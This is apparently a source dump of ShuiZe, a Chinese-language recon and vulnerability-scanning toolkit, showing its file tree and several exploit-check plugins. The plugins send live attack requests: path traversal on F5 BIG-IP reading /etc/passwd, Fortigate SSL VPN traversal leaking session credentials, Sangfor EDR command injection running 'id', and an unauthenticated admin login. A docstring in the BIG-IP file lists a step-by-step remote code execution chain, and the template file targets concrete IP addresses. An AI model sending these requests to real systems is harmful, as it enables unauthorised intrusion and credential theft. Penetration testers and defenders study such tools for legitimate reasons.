├── Plugins
├── Vul
│ ├── CMS
│ │ ├── BIG-IP.py
│ │ ├── Fortigate.py
│ │ ├── Nexus.py
│ │ ├── RuiJie.py
│ │ ├── SangforEdr.py
│ │ ├── Solr.py
│ │ ├── SpringBoot.py
│ │ ├── Tomcat.py
│ │ ├── Tomcat_AJP_LFI.py
│ │ ├── Zabbix.py
│ │ ├── __init__.py
│ │ ├── __template__.py
│ │ ├── fanwei.py
│ │ ├── qizhi.py
│ │ ├── seeyon.py
│ │ ├── tongda.py
│ │ └── tongda_include.py
│ ├── Nuclei
│ │ ├── NucleiApi.py
│ │ ├── __init__.py
│ │ └── nuclei
│ ├── ObserverWard
│ │ ├── ObserverWardApi.py
│ │ ├── __init__.py
│ │ └── observer_ward
│ ├── Param
│ │ ├── SqlInject.py
│ │ ├── __init__.py
│ │ └── __template__.py
│ ├── Service
│ │ ├── __init__.py
│ │ ├── unAuthElastic.py
│ │ ├── unAuthLdaps.py
│ │ ├── unAuthMongodb.py
│ │ ├── unAuthRedis.py
│ │ ├── unAuthZookeeper.py
│ │ ├── weakMSSQL.py
│ │ ├── weakMYSQL.py
│ │ └── weakSSH.py
│ ├── Web
│ │ ├── BackupFile.py
│ │ ├── Editor.py
│ │ ├── FineReport.py
│ │ ├── HILLSTONE.py
│ │ ├── IBM.py
│ │ ├── JEECMS.py
│ │ ├── Jboss.py
│ │ ├── JumpServer.py
│ │ ├── Mail.py
│ │ ├── Nacos.py
│ │ ├── Nginx.py
│ │ ├── __Realor.py
│ │ ├── __init__.py
│ │ ├── __template__.py
│ │ ├── axis2.py
│ │ ├── baota.py
│ │ ├── cms.py
│ │ ├── cmspro.py
│ │ ├── codeLeak.py
│ │ ├── easyConnect.py
│ │ ├── emobile.py
│ │ ├── iOffice.py
│ │ ├── indexCms.py
│ │ ├── phpstudy.py
│ │ ├── shiro.py
│ │ ├── struts2.py
│ │ ├── thinkphp.py
│ │ ├── weblogic.py
│ │ ├── yongyou.py
│ │ └── zentao.py
│ ├── Win
│ │ ├── CVE_2020_0796.py
│ │ └── __init__.py
│ └── __init__.py
├── __init__.py
├── infoGather
│ ├── Intranet
│ │ ├── __init__.py
│ │ ├── getMoreIp.py
│ │ └── scanPort
│ │ │ ├── __init__.py
│ │ │ └── scanPort.py
│ ├── ParamSpider
│ │ ├── __init__.py
│ │ └── paramSpider.py
│ ├── SocksProxy
│ │ ├── __init__.py
│ │ └── getSocksProxy.py
│ ├── WebspaceSearchEngine
│ │ ├── __init__.py
│ │ ├── fofaApi.py
│ │ ├── qianxinApi.py
│ │ ├── quakeApi.py
│ │ └── shodanApi.py
│ ├── __init__.py
│ ├── subdomain
│ │ ├── Aiqicha
│ │ │ ├── Aiqicha.py
│ │ │ └── __init__.py
│ │ ├── CDN
│ │ │ ├── GeoLite2-ASN.mmdb
│ │ │ ├── __init__.py
│ │ │ ├── cdn-domain.conf
│ │ │ └── checkCDN.py
│ │ ├── CSubnet
│ │ │ ├── CSubnet.py
│ │ │ ├── __init__.py
│ │ │ └── demo.py
│ │ ├── Certs
│ │ │ ├── __init__.py
│ │ │ ├── cacert.pem
│ │ │ └── crawlCerts.py
│ │ ├── FriendChins
│ │ │ ├── __init__.py
│ │ │ └── crawlFriendChins.py
│ │ ├── Spider
│ │ │ ├── Baidu
│ │ │ │ ├── __init__.py
│ │ │ │ └── baidu.py
│ │ │ ├── Bing
│ │ │ │ ├── __init__.py
│ │ │ │ └── bing.py
│ │ │ ├── Google
│ │ │ │ ├── .google-cookie
│ │ │ │ ├── .travis.yml
│ │ │ │ ├── demo.py
│ │ │ │ ├── docs
│ │ │ │ │ ├── .gitignore
│ │ │ │ │ ├── Makefile
│ │ │ │ │ ├── conf.py
│ │ │ │ │ ├── index.rst
│ │ │ │ │ └── make.bat
│ │ │ │ ├── google.py
│ │ │ │ └── googlesearch
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── user_agents.txt.gz
│ │ │ └── __init__.py
│ │ ├── Sublist3r
│ │ │ ├── README.md
│ │ │ ├── setup.py
│ │ │ ├── subbrute
│ │ │ │ ├── __init__.py
│ │ │ │ ├── names.txt
│ │ │ │ ├── resolvers.txt
│ │ │ │ └── subbrute.py
│ │ │ └── sublist3r.py
│ │ ├── __init__.py
│ │ ├── beian2NewDomain
│ │ │ ├── __init__.py
│ │ │ └── beian2domain.py
│ │ ├── domain.py
│ │ ├── githubSubdomains
│ │ │ ├── __init__.py
│ │ │ └── githubSubdomains.py
│ │ ├── hostCollide
│ │ │ ├── __init__.py
│ │ │ └── hostCollide.py
│ │ ├── ip2domain
│ │ │ ├── __init__.py
│ │ │ └── getIp2Domain.py
│ │ ├── ipAddress
│ │ │ ├── __init__.py
│ │ │ └── getIpAddress.py
│ │ ├── ksubdomain
│ │ │ ├── __init__.py
│ │ │ ├── ksubdomain.py
│ │ │ └── ksubdomain_linux
│ │ ├── lijiejie
│ │ │ ├── .gitignore
│ │ │ ├── 1.txt
│ │ │ ├── README.md
│ │ │ ├── __init__.py
│ │ │ ├── lib
│ │ │ │ ├── __init__.py
│ │ │ │ ├── cmdline.py
│ │ │ │ ├── common.py
│ │ │ │ └── consle_width.py
│ │ │ └── subDomainsBrute.py
│ │ ├── othersApiSubdomains
│ │ │ ├── __init__.py
│ │ │ └── othersApiSubdomains.py
│ │ ├── queryA
│ │ │ ├── __init__.py
│ │ │ └── queryA.py
│ │ ├── scanPort
│ │ │ ├── __init__.py
│ │ │ ├── demo.py
│ │ │ ├── scanPort.py
│ │ │ └── server_info.ini
│ │ ├── subdomain3
│ │ │ ├── Bruteapi.py
│ │ │ ├── __init__.py
│ │ │ ├── brutedns.py
│ │ │ └── config
│ │ │ │ ├── __init__.py
│ │ │ │ └── config.py
│ │ ├── subdomainInterface
│ │ │ ├── __init__.py
│ │ │ └── subdomainInterface.py
│ │ ├── template
│ │ │ └── multiThreading.py
│ │ ├── theHarvester
│ │ │ ├── .gitattributes
│ │ │ ├── .gitignore
│ │ │ ├── .lgtm.yml
│ │ │ ├── .travis.yml
│ │ │ ├── Dockerfile
│ │ │ ├── Pipfile
│ │ │ ├── Pipfile.lock
│ │ │ ├── README.md
│ │ │ ├── README
│ │ │ │ ├── CONTRIBUTING.md
│ │ │ │ ├── COPYING
│ │ │ │ └── LICENSES
│ │ │ ├── api-keys.yaml
│ │ │ ├── mypy.ini
│ │ │ ├── proxies.yaml
│ │ │ ├── requirements.txt
│ │ │ ├── requirements
│ │ │ │ ├── base.txt
│ │ │ │ └── dev.txt
│ │ │ ├── runTheHarvester
│ │ │ │ ├── __init__.py
│ │ │ │ ├── __main__.py
│ │ │ │ ├── discovery
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── baidusearch.py
│ │ │ │ │ ├── bingsearch.py
│ │ │ │ │ ├── bufferoverun.py
│ │ │ │ │ ├── certspottersearch.py
│ │ │ │ │ ├── constants.py
│ │ │ │ │ ├── crtsh.py
│ │ │ │ │ ├── dnsdumpster.py
│ │ │ │ │ ├── dnssearch.py
│ │ │ │ │ ├── dogpilesearch.py
│ │ │ │ │ ├── duckduckgosearch.py
│ │ │ │ │ ├── exaleadsearch.py
│ │ │ │ │ ├── githubcode.py
│ │ │ │ │ ├── googlesearch.py
│ │ │ │ │ ├── hackertarget.py
│ │ │ │ │ ├── huntersearch.py
│ │ │ │ │ ├── intelxsearch.py
│ │ │ │ │ ├── linkedinsearch.py
│ │ │ │ │ ├── netcraft.py
│ │ │ │ │ ├── otxsearch.py
│ │ │ │ │ ├── pentesttools.py
│ │ │ │ │ ├── rapiddns.py
│ │ │ │ │ ├── securitytrailssearch.py
│ │ │ │ │ ├── shodansearch.py
│ │ │ │ │ ├── spyse.py
│ │ │ │ │ ├── sublist3r.py
│ │ │ │ │ ├── suip.py
│ │ │ │ │ ├── takeover.py
│ │ │ │ │ ├── threatcrowd.py
│ │ │ │ │ ├── threatminer.py
│ │ │ │ │ ├── trello.py
│ │ │ │ │ ├── twittersearch.py
│ │ │ │ │ ├── urlscan.py
│ │ │ │ │ ├── virustotal.py
│ │ │ │ │ └── yahoosearch.py
│ │ │ │ ├── lib
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── core.py
│ │ │ │ │ ├── hostchecker.py
│ │ │ │ │ ├── ip-ranges.json
│ │ │ │ │ ├── reportgraph.py
│ │ │ │ │ ├── resolvers.txt
│ │ │ │ │ ├── stash.py
│ │ │ │ │ └── statichtmlgenerator.py
│ │ │ │ └── parsers
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── intelxparser.py
│ │ │ │ │ ├── myparser.py
│ │ │ │ │ └── securitytrailsparser.py
│ │ │ ├── setup.cfg
│ │ │ ├── setup.py
│ │ │ ├── tests
│ │ │ │ ├── __init__.py
│ │ │ │ ├── discovery
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── test_certspotter.py
│ │ │ │ │ ├── test_githubcode.py
│ │ │ │ │ ├── test_linkedin_links.py
│ │ │ │ │ ├── test_linkedin_links.txt
│ │ │ │ │ ├── test_otx.py
│ │ │ │ │ ├── test_sublist3r.py
│ │ │ │ │ └── test_threatminer.py
│ │ │ │ └── test_myparser.py
│ │ │ ├── theHarvester-logo.png
│ │ │ ├── theHarvester.py
│ │ │ └── wordlists
│ │ │ │ ├── dns-big.txt
│ │ │ │ ├── dns-names.txt
│ │ │ │ ├── dorks.txt
│ │ │ │ ├── general
│ │ │ │ └── common.txt
│ │ │ │ └── names_small.txt
│ │ ├── verifyEmails
│ │ │ ├── VerifyEmails.py
│ │ │ ├── __init__.py
│ │ │ ├── mail.txt
│ │ │ └── 常见用户名.txt
│ │ └── webDetect
│ │ │ ├── __init__.py
│ │ │ ├── demo.py
│ │ │ └── result.txt
│ └── webInfo
│ │ ├── Feature.json
│ │ ├── Wappalyzer
│ │ ├── Wappalyzer.py
│ │ ├── __init__.py
│ │ └── data
│ │ │ └── apps.json
│ │ ├── __init__.py
│ │ ├── getWebInfo.py
│ │ └── getWebTitle.py
└── saveToExcel.py
├── README.md
├── ShuiZe.py
├── __init__.py
├── build.sh
├── docker_build.sh
├── imgs
├── 0x727.png
├── ObserverWard1.png
├── aiqicha.png
├── banner.png
├── github_auther.png
├── hostCollide.png
├── image-20210728132105833.png
├── image-20210728132752381.png
├── image-20210728133047590.png
├── image-20210728134051049.png
├── image-20210728134115608.png
├── image-20210728134131076.png
├── image-20210728134212279.png
├── image-20210728134304533.png
├── image-20210728153419131.png
├── image-20210728154929084.png
├── image-20210728155358378.png
├── image-20210728155541501-7458943.png
├── image-20210728155541501.png
├── image-20210728160705706.png
├── image-20210728161022348.png
├── image-20210728161117459.png
├── image-20210728161339208.png
├── image-20210728161507035.png
├── image-20210728161711534.png
├── image-20210728162049962.png
├── image-20210728162119531.png
├── image-20210728162303312.png
├── image-20210728162441132.png
├── image-20210728162655684.png
├── image-20210728163216047.png
├── image-20210728163926763.png
├── image-20210728163940918.png
├── image-20210728164010063.png
├── image-20210728164040649.png
├── image-20210728164146630.png
├── image-20210728164211552.png
├── image-20210728164316747.png
├── image-20210728164555141.png
├── image-20210728164745820.png
├── image-20210728164811422.png
├── image-20210728164933353.png
├── image-20210728165004202.png
├── image-20210728165052361.png
├── image-20210728165612314.png
├── image-20210728170303756.png
├── image-20210728193058487.png
├── kuaidaili1.png
├── kuaidaili2.png
├── kuaidaili3.png
├── kuaidaili4.png
├── nuclei_1.png
├── qianxinApi.png
├── qianxinApi2.png
├── quakeApi.png
├── quakeApi2.png
├── securitytrails.png
├── socksProxy.png
└── xmind.png
├── iniFile
├── PwdTxt
│ ├── dic_password_ftp.txt
│ ├── dic_password_imap.txt
│ ├── dic_password_imap_ssl.txt
│ ├── dic_password_memcached.txt
│ ├── dic_password_mongodb.txt
│ ├── dic_password_mysql.txt
│ ├── dic_password_oracle.txt
│ ├── dic_password_pop3.txt
│ ├── dic_password_postgresql.txt
│ ├── dic_password_rdp.txt
│ ├── dic_password_redis.txt
│ ├── dic_password_smtp.txt
│ ├── dic_password_sqlserver.txt
│ ├── dic_password_ssh.txt
│ ├── dic_password_svn.txt
│ ├── dic_password_telnet.txt
│ ├── dic_password_tomcat.txt
│ ├── dic_password_vnc.txt
│ └── dic_password_weblogic.txt
├── SQLPayloads
│ ├── blank.xml
│ ├── errors.xml
│ ├── payloads.xml
│ └── test.xml
├── config.ini
├── dict
│ ├── dns_servers.txt
│ ├── next_sub.txt
│ ├── next_sub_full.txt
│ ├── subnames.txt
│ ├── subnames_all_5_letters.txt
│ └── subnames_full.txt
└── subdomain3
│ ├── cdn_servers.txt
│ ├── name_servers.txt
│ ├── next_sub_full.txt
│ └── sub_full.txt
├── requirements.txt
├── requirements2.txt
└── versionFlag.txt
/Plugins/Vul/CMS/BIG-IP.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
9 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
10 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
11 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # BIG-IP
15 | class Detect(threading.Thread):
16 | name = 'BIG-IP'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url
21 | self.vul_list = vul_list # 存储漏洞的名字和url
22 | self.proxies = requests_proxies # 代理
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # 检测该url是否存在漏洞,默认为False,如果测出有漏洞,则设置为True
25 |
26 | # 调用各种漏洞检测方法
27 | def run_detect(self):
28 | # 任意文件读取
29 | self.readFile()
30 |
31 | if not self.isExist:
32 | return False
33 | else:
34 | return True
35 |
36 | # 任意文件读取
37 | def readFile(self):
38 | url1 = self.url + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
39 | tqdm.write(Fore.WHITE + 'test readFile : {}'.format(url1))
40 | try:
41 | res = requests.get(url=url1, headers=self.headers, proxies=self.proxies, verify=False)
42 | if '"root:x:0:0:root:' in res.text:
43 | self.isExist = True
44 | tqdm.write(Fore.RED + '[BIG-IP 任意文件读取] {}'.format(self.url))
45 | self.vul_list.append(['BIG-IP 任意文件读取', self.url, 'Yes {}'.format(url1)])
46 | except Exception as e:
47 | tqdm.write(Fore.WHITE + '{}'.format(e.args))
48 | return False
49 |
50 | # RCE
51 | def webVul2(self):
52 | '''
53 | 1. 修改alias劫持list命令为bash
54 | /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
55 |
56 | 2. 写入bash文件
57 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/xxx&content=id
58 |
59 | 3. 执行bash文件
60 | /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/xxx
61 |
62 | 4. 还原list命令
63 | /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list
64 | :return:
65 | '''
66 |
67 | if __name__ == '__main__':
68 | from queue import Queue
69 |
70 | vul_list = []
71 | # proxy = r'192.168.168.148:10086'
72 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
73 | requests_proxies = None
74 | url = r'http://www.domain.com'
75 | Detect(url, vul_list, requests_proxies).run_detect()
76 |
77 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
78 | for vul in vul_list:
79 | tqdm.write(Fore.BLACK + str(vul))
80 |
81 |
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/Fortigate.py:
--------------------------------------------------------------------------------
1 | from urllib import request as urlRequests
2 | from termcolor import cprint
3 | import requests
4 | from tqdm import *
5 | from colorama import Fore
6 |
7 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
8 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
9 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
10 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
11 |
12 |
13 |
14 | # Fortigate SSL VPN 漏洞
15 | class Detect:
16 | name = 'Fortigate SSL VPN'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | self.url = url
20 | self.vul_list = vul_list # 存储漏洞的名字和url
21 | self.requests_proxies = requests_proxies
22 | self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'}
23 | self.isExist = False # 检测该url是否存在漏洞,默认为False,如果测出有漏洞,则设置为True
24 |
25 |
26 | def run_detect(self):
27 | # 检测任意文件读取漏洞
28 | self.read_UserPwd()
29 |
30 | if not self.isExist:
31 | return False
32 | else:
33 | return True
34 |
35 | # 任意文件读取漏洞-读取vpn的账号密码
36 | def read_UserPwd(self):
37 | vul_url = '{}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'.format(self.url.rstrip('//'))
38 | res = requests.get(url=vul_url, headers=self.headers, proxies=self.requests_proxies, verify=False)
39 | if res.status_code == 200:
40 | tqdm.write(Fore.RED + '[Fortigate SSL VPN Read Username and Password] {}'.format(vul_url))
41 | self.vul_list.append(['Fortigate SSL VPN', self.url, 'YES {}'.format(vul_url)])
42 | self.isExist = True
43 | return True
44 | else:
45 | return False
46 |
47 |
48 | if __name__ == '__main__':
49 |
50 | vul_list = []
51 | # proxy = r'192.168.168.148:10086'
52 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
53 | requests_proxies = None
54 | url = r'http://www.domain.com'
55 | Detect(url, vul_list, requests_proxies).run_detect()
56 |
57 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
58 | for vul in vul_list:
59 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/RuiJie.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
9 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
10 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
11 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # 模板
15 | class Detect(threading.Thread):
16 | name = '锐捷漏洞'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url
21 | self.vul_list = vul_list # 存储漏洞的名字和url
22 | self.proxies = requests_proxies # 代理
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # 检测该url是否存在漏洞,默认为False,如果测出有漏洞,则设置为True
25 |
26 | # 调用各种漏洞检测方法
27 | def run_detect(self):
28 | # 锐捷易网关RCE
29 | self.webVul1()
30 |
31 | if not self.isExist:
32 | return False
33 | else:
34 | return True
35 |
36 | # 锐捷易网关RCE
37 | def webVul1(self):
38 | url1 = self.url + '/guest_auth/guestIsUp.php'
39 | tqdm.write(Fore.WHITE + 'test RCE : {}'.format(url1))
40 | try:
41 | res = requests.get(url=url1, headers=self.headers, proxies=self.proxies, verify=False, allow_redirects=False)
42 | if res.status_code == 200:
43 | self.isExist = True
44 | tqdm.write(Fore.RED + '[锐捷易网关RCE] {}'.format(url1))
45 | self.vul_list.append(['锐捷易网关RCE', self.url, 'Yes {}'.format(url1)])
46 | except Exception as e:
47 | return False
48 |
49 | if __name__ == '__main__':
50 | from queue import Queue
51 |
52 | vul_list = []
53 | # proxy = r'192.168.168.148:10086'
54 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
55 | requests_proxies = None
56 | url = r'http://www.domain.com'
57 | Detect(url, vul_list, requests_proxies).run_detect()
58 |
59 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
60 | for vul in vul_list:
61 | tqdm.write(Fore.BLACK + str(vul))
62 |
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/SangforEdr.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
9 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
10 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
11 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # 模板
15 | class Detect(threading.Thread):
16 | name = '深信服EDR'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url
21 | self.vul_list = vul_list # 存储漏洞的名字和url
22 | self.proxies = requests_proxies # 代理
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # 检测该url是否存在漏洞,默认为False,如果测出有漏洞,则设置为True
25 |
26 | # 调用各种漏洞检测方法
27 | def run_detect(self):
28 | # 漏洞1
29 | self.webVul1()
30 |
31 | # 漏洞2
32 | self.webVul2()
33 |
34 | if not self.isExist:
35 | return False
36 | else:
37 | return True
38 |
39 | # 配置错误造成未授权访问
40 | def webVul1(self):
41 | url1 = self.url + '/ui/login.php?user=admin'
42 | tqdm.write(Fore.WHITE + 'test admin : {}'.format(url1))
43 | try:
44 | res = requests.get(url=url1, headers=self.headers, proxies=self.proxies, verify=False, allow_redirects=False)
45 | if res.status_code == 302:
46 | self.isExist = True
47 | tqdm.write(Fore.RED + '[深信服EDR未授权admin登陆] {}'.format(url1))
48 | self.vul_list.append(['深信服EDR未授权admin登陆', self.url, 'Yes {}'.format(url1)])
49 | except Exception as e:
50 | return False
51 |
52 | # RCE
53 | def webVul2(self):
54 | url2 = self.url + '/tool/log/c.php?strip_slashes=system&host=id'
55 | tqdm.write(Fore.WHITE + 'test rce : {}'.format(url2))
56 | try:
57 | res = requests.get(url=url2, headers=self.headers, proxies=self.proxies, verify=False)
58 | if res.status_code == 200 and 'uid=' in res.text:
59 | self.isExist = True
60 | tqdm.write(Fore.RED + "[深信服EDR RCE] {}".format(url2))
61 | self.vul_list.append(['深信服EDR RCE', url2, "Yes"])
62 | except Exception as e:
63 | return False
64 |
65 | if __name__ == '__main__':
66 | from queue import Queue
67 |
68 | vul_list = []
69 | proxy = r'192.168.168.148:10086'
70 | requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
71 | # requests_proxies = None
72 | url = r'http://www.domain.com'
73 | Detect(url, vul_list, requests_proxies).run_detect()
74 |
75 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
76 | for vul in vul_list:
77 | tqdm.write(Fore.BLACK + str(vul))
78 |
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/CMS/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/__template__.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
9 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
10 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
11 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # 模板
15 | class Detect(threading.Thread):
16 | name = '漏洞名'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url.rstrip('/')
21 | self.vul_list = vul_list # 存储漏洞的名字和url
22 | self.proxies = requests_proxies # 代理
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # 检测该url是否存在漏洞,默认为False,如果测出有漏洞,则设置为True
25 |
26 | # 调用各种漏洞检测方法
27 | def run_detect(self):
28 | # 漏洞1
29 | self.webVul1()
30 |
31 | # 漏洞2
32 | self.webVul2()
33 |
34 | if not self.isExist:
35 | return False
36 | else:
37 | return True
38 |
39 | # 漏洞1
40 | def webVul1(self):
41 | url1 = self.url + '11111'
42 | tqdm.write(Fore.WHITE + 'test upload : {}'.format(url1))
43 | try:
44 | res = requests.get(url=url1, headers=self.headers, proxies=self.proxies, verify=False)
45 | if res.status_code == 200:
46 | self.isExist = True
47 | tqdm.write(Fore.RED + '[泛微oa 111] {}'.format(self.url))
48 | self.vul_list.append(['泛微oa 111', self.url, 'Yes {}'.format(url1)])
49 | except Exception as e:
50 | return False
51 |
52 | # 漏洞2
53 | def webVul2(self):
54 | url2 = self.url + '/222222'
55 | tqdm.write(Fore.WHITE + 'test sql : {}'.format(url2))
56 | try:
57 | res = requests.get(url=url2, headers=self.headers, proxies=self.proxies, verify=False)
58 | if res.status_code == 200 and '[{"' in res.text:
59 | self.isExist = True
60 | tqdm.write(Fore.RED + "[泛微oa SQL] {}222222".format(self.url))
61 | self.vul_list.append(['泛微oa SQL', self.url + "2222222", "Yes"])
62 | except Exception as e:
63 | # print(e.args)
64 | return False
65 |
66 | if __name__ == '__main__':
67 | from queue import Queue
68 |
69 | vul_list = []
70 | # proxy = r'192.168.168.148:10086'
71 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
72 | requests_proxies = None
73 | # url = r'https://223.72.156.204'
74 | url = r'https://210.82.119.85'
75 | Detect(url, vul_list, requests_proxies).run_detect()
76 |
77 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
78 | for vul in vul_list:
79 | tqdm.write(Fore.BLACK + str(vul))
80 |
81 |
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/fanwei.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # 全都用tqdm.write(url)打印 能够打印在进度条上方,并将进度条下移一行。
9 | # 存在漏洞可能得需要红色,使用 tqdm.write(Fore.RED + url) 打印则有颜色
10 | # 打印一些错误需要灰色 使用 tqdm.write(Fore.WHITE + url)
11 | # 打印漏洞结果 使用 tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # 泛微oa
15 | class Detect(threading.Thread):
16 | name = 'fanwei'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url.rstrip('/')
21 | self.vul_list = vul_list # 存储漏洞的名字和url
22 | self.proxies = requests_proxies # 代理
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # 检测该url是否存在漏洞,默认为False,如果测出有漏洞,则设置为True
25 |
26 | # 调用各种漏洞检测方法
27 | def run_detect(self):
28 | # 任意文件上传
29 | self.upload1()
30 |
31 | # 漏洞2
32 | self.bridgeRead()
33 |
34 |
35 | if not self.isExist:
36 | return False
37 | else:
38 | return True
39 |
40 | # 泛微OA v9.0 前台任意文件上传getshell
41 | def upload1(self):
42 | uploadOperation_url = self.url + '/page/exportImport/uploadOperation.jsp'
43 | try:
44 | res = requests.get(url=uploadOperation_url, headers=self.headers, proxies=self.proxies, verify=False, allow_redirects=False)
45 | if res.status_code == 200:
46 | self.isExist = True
47 | tqdm.write(Fore.RED + '[泛微OA v9.0 uploadOperation] {}'.format(self.url))
48 | self.vul_list.append(['泛微OA v9.0 uploadOperation', self.url, 'Yes {}'.format(uploadOperation_url)])
49 | except Exception as e:
50 | return False
51 |
52 | # 泛微云桥 E-Bridge 2018 2019 任意文件读取
53 | def bridgeRead(self):
54 | bridgeRead_url = self.url + '/wxjsapi/saveYZJFile'
55 | try:
56 | res = requests.get(url=bridgeRead_url, headers=self.headers, proxies=self.proxies, verify=False, allow_redirects=False)
57 | if res.status_code == 200:
58 | self.isExist = True
59 | tqdm.write(Fore.RED + '[泛微E-Bridge 任意文件读取] {}'.format(self.url))
60 | self.vul_list.append(['泛微E-Bridge 任意文件读取', self.url, 'Yes {}'.format(bridgeRead_url)])
61 | except Exception as e:
62 | return False
63 |
64 |
65 |
66 | if __name__ == '__main__':
67 | from queue import Queue
68 |
69 | vul_list = []
70 | # proxy = r'192.168.168.148:10086'
71 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
72 | requests_proxies = None
73 | url = r'http://www.domain.com'
74 | Detect(url, vul_list, requests_proxies).run_detect()
75 |
76 | tqdm.write(Fore.BLACK + '-' * 50 + '结果 ' + '-' * 50)
77 | for vul in vul_list:
78 | tqdm.write(Fore.BLACK + str(vul))
79 |
80 |
